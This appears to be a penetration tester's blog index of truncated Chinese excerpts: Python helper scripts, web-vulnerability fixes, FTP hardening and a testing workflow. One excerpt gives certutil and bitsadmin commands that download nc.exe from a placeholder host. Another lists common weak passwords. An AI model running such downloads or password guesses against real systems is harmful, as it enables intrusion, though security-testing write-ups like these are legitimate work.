原创 python3基礎學習(base64編碼轉換)

import base64 import sys a = base64.b64encode((sys.argv[1]).encode(encoding='utf-8')).decode() b = base64.b64decode(sys

原创 windows遠程下載文件

windows遠程下載文件certutil -urlcache -split -f http://xxx.com/test.txt 2.txtbitsadmin /transfer n http://www.xxx.com/nc.exe c

原创 常規web***測試漏洞描述及修復建議

Apache樣例文件泄漏 測試方法   在鏈接的根目錄中添加examples或者docs目錄進行訪問判斷! 漏洞描述  apache一些樣例文件沒有刪除,可能存在cookie、session僞造,進行後臺登錄操作 修復建議  1、刪除樣例文

原创 禁止匿名VSFTP用戶登錄

編輯/etc/vsftpd.conf(或/etc/vsftpd/vsftpd.conf)文件設置:anonymous_enable=NO

原创 敏感數據明文傳輸引發的全新***

http://blog.nsfocus.net/sensitive-data-clear-text-transmission/

原创 excel 走自己的“錄”,讓別人重複去吧

  對於excel文檔,有時我們會遇到很多重複性的操作,如果數據量很大的話往往會花費我們大量的時間,並且一不小心就會弄錯,此時我們就可以錄製我們自己的宏,讓它按照某種路線自動完成。  不方便移過來 詳情點擊此處

原创 ***測試基本流程(針對工作中的***測試)

  這裏介紹的***測試流程主要是針對工作中的,因此僅供參考! &wmap;***測試就是通過模擬惡意***者的技術和方法,挫敗目標系統安全控制措施,取得訪問控制權,並發現具備業務影響後果安全隱患的一種安全測試與評估方法,基本流程如圖1: 

原创 python3基礎學習(http host頭***漏洞POC)

  簡單版http host頭***漏洞POC,沒有對異常進行處理,沒有對意外情況進行處理,所以是簡單版!代碼如下: from urllib import request import sys import re url=sys.argv[

原创 2017弱口令top55收集

個人收集,僅供參考!參考鏈接1參考鏈接2 123456 123456789 qwerty password 111111 12345678 abc123 1234567 password1 1234567890 123123 12345 h

原创 python3基礎學習(查看服務器開放的HTTP方法POC)

  查看服務器是否開放了不安全的HTTP方法,代碼如下: from http.client import HTTPConnection import sys import re domain = HTTPConnection(sys.ar

原创 windows查看當前路徑

  在***測試中,常常會需要查看當前路徑,如果是linux的話,我們使用pwd,如果是windows的話,之前我是使用dir,然後滑到上面去看,如果文件過多的話不是很方便。  此時我們可以使用另一個命令——chdir,來進行查看windo

原创 excel之兩個sheet對比

詳情點擊此處